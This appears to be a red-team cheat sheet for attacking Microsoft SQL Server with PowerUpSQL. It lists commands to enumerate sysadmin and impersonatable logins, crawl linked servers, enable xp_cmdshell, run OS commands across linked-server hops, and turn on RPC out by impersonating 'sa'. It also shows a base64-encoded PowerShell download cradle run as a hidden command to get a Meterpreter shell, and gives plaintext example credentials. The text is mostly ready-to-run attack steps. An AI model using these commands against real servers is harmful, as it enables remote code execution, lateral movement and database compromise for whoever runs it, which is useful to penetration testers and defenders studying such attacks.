SQL Server Instance

  • Instance



Get-SQLConnectionTest -Instance "srv-1.red.com,1433"
  • Server Info

get-sqlserverinfo -instance "redsql\sqlexpress"
  • Privilege Enumeration

Sysadmin logins/users

Get-SQLQuery -Instance 'red.com,1433' -query "select name from master..syslogins where sysadmin=1;"

User/Login can be impersonated

Get-SQLQuery -Instance 'red.com,1433' -query "SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE';"
  • Linked Servers

Not all users can see all links

select * from master..sysservers; (SQL Query)

exec sp_linkedservers; (SQL Query)

get-sqlserverlinkcrawl -instance "cywebdw\sqlexpress" -username webapp11 -password 89543dfGDFGH4d (PowerUpSQL Query)

get-sqlquery -instance "CYWEBDW\SQLEXPRESS" -query "select * from openquery(""m3sqlw.red.local"",'select * from master..sysservers')" (PowerUpSQL Open Query)
  • Value of xp_cmdshell

select * from sys.configurations where name='xp_cmdshell' (SQL Query)

get-sqlquery -instance "CYWEBDW\SQLEXPRESS" -query "select * from sys.configurations where name ='xp_cmdshell'" (PowerUpSQL Query)

get-sqlquery -instance "CYWEBDW\SQLEXPRESS" -query "select * from openquery (""m3sqlw.red.local"",'select * from sys.configurations where name=''xp_cmdshell''')" (PowerUpSQL OpenQuery)
  • Enable xp_cmdshell

EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

exec xp_cmdshell 'whoami'; (SQL Query)

get-sqlquery -instance "CYWEBDW\SQLEXPRESS" -query "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;EXEC master.dbo.xp_cmdshell 'whoami';"  (PowerUpSQL Query)

get-sqlquery -instance "web06\sqlexpress" -query "exec ('sp_configure ''show advanced options'', 1; reconfigure; exec sp_configure ''xp_cmdshell'', 1; reconfigure;') AT sql03; exec('xp_cmdshell ''hostname'';') at SQL03" -username sa -password Passw0rd  (1 hop PowerUpSQL Query)
  • xp_cmdshell Meterpreter Shell

echo -en 'IEX ((new-object net.webclient).downloadstring(""))' | iconv -t UTF-16LE | base64 -w 0 (Encode Payload)

exec xp_cmdshell 'powershell -w hidden -enc <...>' (SQL Query)

Invoke-SQLOSCmd -Instance "CYWEBDW\SQLEXPRESS" -Command "powershell -w hidden -enc <...> " -RawResults  (PowerUpSQL Query 1)

get-sqlquery -instance "CYWEBDW\SQLEXPRESS" -query "EXEC('xp_cmdshell ''powershell -w hidden -enc <...> '' ; ' ) " (PowerUpSQL Query 2)

get-sqlquery -instance "CYWEBDW\SQLEXPRESS" -query "EXEC('xp_cmdshell ''powershell -w hidden -enc <...> '' ; ' )AT [m3sqlw.red.local]" (1 hop PowerUpSQL query)
  • Enable Rpcout

execute as login='sa'; exec sp_serveroption 'sql03', 'rpc out', 'true'; (SQL Query)

get-sqlquery -instance "cywebdb\sqlexpress" -query "execute as login ='sa'; exec sp_serveroption 'm3sqlw.red.local', 'rpc out', 'true'" (PowerUpSQL Query)

get-sqlquery -instance "cywebdb\sqlexpress" -query "execute as login ='sa'; exec (sp_serveroption 'm3sqlw.red.local', 'rpc out', 'true') at [m3sqlw.red.local]" (PowerUpSQL Open Query)

Privilege Escalation is not necessary to be done immediately

DA or some specific domain users have admin privilege over current host

Password/Hash reuse

Similar machines could share the same password/hash

SQL01 and SQL02

SQL01 and File01

Last updated